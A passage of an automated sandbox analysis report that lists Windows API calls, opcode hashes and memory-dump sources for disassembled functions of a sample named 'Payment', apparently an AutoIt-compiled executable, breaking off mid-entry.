                                                          • Instruction ID: 8e60069471022338a1fbd56c071a6645381c1dd5a1e923da4ac944cb79aa9701
                                                          • Opcode Fuzzy Hash: 405ccf2f6f0a070aeb24cae0c9dfcb9daf6267c9dc96f8709bc70c7a538b05f4
                                                          • Instruction Fuzzy Hash: 94F0307A100204ABCF016F95DC85B5ABB69EF45321F1481A1FE085F216CB32A911CBB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AD134D
                                                            • Part of subcall function 00AD12F3: SelectObject.GDI32(?,00000000), ref: 00AD135C
                                                            • Part of subcall function 00AD12F3: BeginPath.GDI32(?), ref: 00AD1373
                                                            • Part of subcall function 00AD12F3: SelectObject.GDI32(?,00000000), ref: 00AD139C
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B5C030
                                                          • LineTo.GDI32(00000000,?,?), ref: 00B5C03D
                                                          • EndPath.GDI32(00000000), ref: 00B5C04D
                                                          • StrokePath.GDI32(00000000), ref: 00B5C05B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: 987bcda0999025731385c499bcec380839c69c9376a8b6248444ece1647537a6
                                                          • Instruction ID: d202cabadcd5c2ab883510357b9bd3a536bcbf5da8d690aa3ef8fae22262f226
                                                          • Opcode Fuzzy Hash: 987bcda0999025731385c499bcec380839c69c9376a8b6248444ece1647537a6
                                                          • Instruction Fuzzy Hash: 63F05E3100135ABBDB126F55AC0EFDE7F99AF15312F084092FA11620E28B765655CFD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B2A399
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B2A3AC
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B2A3B3
                                                          • AttachThreadInput.USER32(00000000), ref: 00B2A3BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 9f0b73e086f29ff78228f0ffb3a5a04cd3ea2c429c748b80968dab615cf13643
                                                          • Instruction ID: a5635686e90136f9e8b35d68ab0bceedb947c3fce8f8a6f936ffbd3d7156eb97
                                                          • Opcode Fuzzy Hash: 9f0b73e086f29ff78228f0ffb3a5a04cd3ea2c429c748b80968dab615cf13643
                                                          • Instruction Fuzzy Hash: F2E0C931545339BBDB205BA2EC0DFE7BF5CEF167A2F0080A5F50996061CA718541DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00AD2231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00AD223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00AD2250
                                                          • GetStockObject.GDI32(00000005), ref: 00AD2258
                                                          • GetWindowDC.USER32(?,00000000), ref: 00B0C0D3
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0C0E0
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00B0C0F9
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00B0C112
                                                          • GetPixel.GDI32(00000000,?,?), ref: 00B0C132
                                                          • ReleaseDC.USER32(?,00000000), ref: 00B0C13D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 5241186b1f23ee38899b9f5d67fcd4140a85c0f29dadb972ab71da6ecf6dd026
                                                          • Instruction ID: 60e51f744f979fc80da6e29a9329b332f8ef223e3247040890287aaed85c7246
                                                          • Opcode Fuzzy Hash: 5241186b1f23ee38899b9f5d67fcd4140a85c0f29dadb972ab71da6ecf6dd026
                                                          • Instruction Fuzzy Hash: ABE06D32100645EADB215F74FC0DBE8BF10EB15333F0083A6FAA9690E18B714980DB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00B28C63
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B2882E), ref: 00B28C6A
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B2882E), ref: 00B28C77
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B2882E), ref: 00B28C7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: cfd0fd37e30f01d45bf7c8cb8582cabf3cfa169ecc8723aa22001a6203208017
                                                          • Instruction ID: 7c4d9755ccdb126dc2192764b9b177c65bd8060fb6f644c07e25ed36e8140b27
                                                          • Opcode Fuzzy Hash: cfd0fd37e30f01d45bf7c8cb8582cabf3cfa169ecc8723aa22001a6203208017
                                                          • Instruction Fuzzy Hash: 2CE04F76642322ABD7205FB07D0CB677BA8EF50793F0848A8B245CB080DE3484418B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00B12187
                                                          • GetDC.USER32(00000000), ref: 00B12191
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B121B1
                                                          • ReleaseDC.USER32(?), ref: 00B121D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: dd731edc7b1a906b3f892338911a583496a893e14cbaf2cb8928921852c5237c
                                                          • Instruction ID: 42a64ce0d66755c082688adfa0172504ef69c51436d3989a59f5403d31f0e820
                                                          • Opcode Fuzzy Hash: dd731edc7b1a906b3f892338911a583496a893e14cbaf2cb8928921852c5237c
                                                          • Instruction Fuzzy Hash: 7DE0E575800216EFDB019F60C848BAEBBF1EB4C352F108466F95AE7260DB388142DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00B1219B
                                                          • GetDC.USER32(00000000), ref: 00B121A5
                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B121B1
                                                          • ReleaseDC.USER32(?), ref: 00B121D2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                          • String ID:
                                                          • API String ID: 2889604237-0
                                                          • Opcode ID: 4be724ff607d10077e1b88ecbcccf455d94b470922143404ddb7b6e56a3c2468
                                                          • Instruction ID: 8e1ec4a7d438dfc8f4f9c77f0d894dce81e79293c1972d6a6385faaa83b325ce
                                                          • Opcode Fuzzy Hash: 4be724ff607d10077e1b88ecbcccf455d94b470922143404ddb7b6e56a3c2468
                                                          • Instruction Fuzzy Hash: 96E0E575800216AFCB019F60C8087AEBBB1AB4C352F108065F95AD7260DB389141DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00B2B981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: d742aade1c0517ec809cdb8b5cfb031421f57bd297e13f9a6d99099241f50da2
                                                          • Instruction ID: 9719f12aa98d088d65f552d6e0e87056060cabbc319b9423f040b61ca098164f
                                                          • Opcode Fuzzy Hash: d742aade1c0517ec809cdb8b5cfb031421f57bd297e13f9a6d99099241f50da2
                                                          • Instruction Fuzzy Hash: 9E914A746006119FDB24DF68D884E6ABBE9FF49710F1485AEF94ACB6A1DF70E840CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AEFEC6: _wcscpy.LIBCMT ref: 00AEFEE9
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • __wcsnicmp.LIBCMT ref: 00B3B298
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B3B361
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: d29f2e9d532052a3d32fc9161c11fb0533268641af306d6b92f019ef9f965a20
                                                          • Instruction ID: 73a8d276c205be216adb85243dfccbaa794748152cce1c3f84a4078d23c6c668
                                                          • Opcode Fuzzy Hash: d29f2e9d532052a3d32fc9161c11fb0533268641af306d6b92f019ef9f965a20
                                                          • Instruction Fuzzy Hash: 6C617575A00215EFCB14DF94C995EAEB7F4EF08310F1141AAFA46AB351DB70AE44CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00AE2AC8
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AE2AE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: a439fdaf62f18bf572f26a6d49be57efcfd27e90cd06879e6c6b9c8e27c9987f
                                                          • Instruction ID: 96fd2b783019254fdd1037eea33c9ec9896eb156527fe2d2522c09e8edb57c46
                                                          • Opcode Fuzzy Hash: a439fdaf62f18bf572f26a6d49be57efcfd27e90cd06879e6c6b9c8e27c9987f
                                                          • Instruction Fuzzy Hash: 905149724187449BD320AF10DC86BAFBBE8FF84314F42885DF1DA512A1DF308969CB16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD506B: __fread_nolock.LIBCMT ref: 00AD5089
                                                          • _wcscmp.LIBCMT ref: 00B39AAE
                                                          • _wcscmp.LIBCMT ref: 00B39AC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: 82c228672ed44df52022630fcb9fa1cf32faa2d0311912595d7c0429cc6d4381
                                                          • Instruction ID: 0ffd7ecaa8ffb8486a228e476ac09a7bd46c1732b287557fc6dd138c5670aafe
                                                          • Opcode Fuzzy Hash: 82c228672ed44df52022630fcb9fa1cf32faa2d0311912595d7c0429cc6d4381
                                                          • Instruction Fuzzy Hash: E641A871A00619BFDF209AA4DC85FEFBBFDDF45710F1004BAF901A7281D6B59A0587A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B42892
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B428C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 95f178eaa38f544ce09fc9367e4d82287b60fb8dacdb34dc09392f0870d94e93
                                                          • Instruction ID: 0924f017982ecb377ead4b64459b861243c156e743c6efa63848d5bc9a8bcba3
                                                          • Opcode Fuzzy Hash: 95f178eaa38f544ce09fc9367e4d82287b60fb8dacdb34dc09392f0870d94e93
                                                          • Instruction Fuzzy Hash: 30313D71800119AFCF05EFA1CD85EEEBFB9FF08340F10406AF815A6265EB315A56EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00B56D86
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B56DC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 5aa98c2d166daaf3615705c87823142e00c3d0e68d52a89ea5e9d9d1dd08abe3
                                                          • Instruction ID: be394864a3849a47e4e0cf5a25b1ae598366a3a3ebe43b7239c4f4c1af909573
                                                          • Opcode Fuzzy Hash: 5aa98c2d166daaf3615705c87823142e00c3d0e68d52a89ea5e9d9d1dd08abe3
                                                          • Instruction Fuzzy Hash: 82319E71200604AADB119F78CC80BFB77F9FF48721F5086A9FDA687190DA31AC95CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B32E00
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B32E3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: be8e056bdcb8dd54e6511eaf21f6e81b5c30e607e613246d12551e8cf0c3d0df
                                                          • Instruction ID: 070ab25271210bea6ce9f33b9b3efec239dc9358897e6bd684209be850571c9a
                                                          • Opcode Fuzzy Hash: be8e056bdcb8dd54e6511eaf21f6e81b5c30e607e613246d12551e8cf0c3d0df
                                                          • Instruction Fuzzy Hash: E931B931A00319EBEB248F58D986BAEBBF9FF05350F3444AAED85971A1D7709944CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B569D0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B569DB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: f8e7372c60b59cb7683790f1f787b70fd4c1ab66e78a10214b738a9a1412c924
                                                          • Instruction ID: e803eef117fdde4e798ca902527461b0b13be3535671ee2a01174587d4f16514
                                                          • Opcode Fuzzy Hash: f8e7372c60b59cb7683790f1f787b70fd4c1ab66e78a10214b738a9a1412c924
                                                          • Instruction Fuzzy Hash: 7611E2713002086FEF119E64CC80FBB37AAEB893A5F5001A5FD58972A0D6719C5587A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AD1D73
                                                            • Part of subcall function 00AD1D35: GetStockObject.GDI32(00000011), ref: 00AD1D87
                                                            • Part of subcall function 00AD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AD1D91
                                                          • GetWindowRect.USER32(00000000,?), ref: 00B56EE0
                                                          • GetSysColor.USER32(00000012), ref: 00B56EFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 1dfa52c9665fc76834f4a76243ea1c100b251862d4a19abe4af268a1e4a7fda4
                                                          • Instruction ID: c51d1c8a4e70f1b303fb92400b2ea9ccaa52ae8dd60088dcf491e3b614a8579b
                                                          • Opcode Fuzzy Hash: 1dfa52c9665fc76834f4a76243ea1c100b251862d4a19abe4af268a1e4a7fda4
                                                          • Instruction Fuzzy Hash: 6D214772A1020AAFDB04DFA8DD45AFABBF8EB08315F0046A9FD55D3250E634E8659B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00B56C11
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B56C20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 8366e6856a1ad48f987018eb75625ca7f66c32162cf52bc6cde3951315178afb
                                                          • Instruction ID: bc64799bf688791de56c6d94ae966b43ae884fe2f208391e8a7022e0087f9be5
                                                          • Opcode Fuzzy Hash: 8366e6856a1ad48f987018eb75625ca7f66c32162cf52bc6cde3951315178afb
                                                          • Instruction Fuzzy Hash: 05119D71100208ABEF108E649C42BBB37AAEB0437AF9047A4FD61D71E0C775DC989B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B32F11
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B32F30
                                                          Strings
                                                          Memory Dump Source
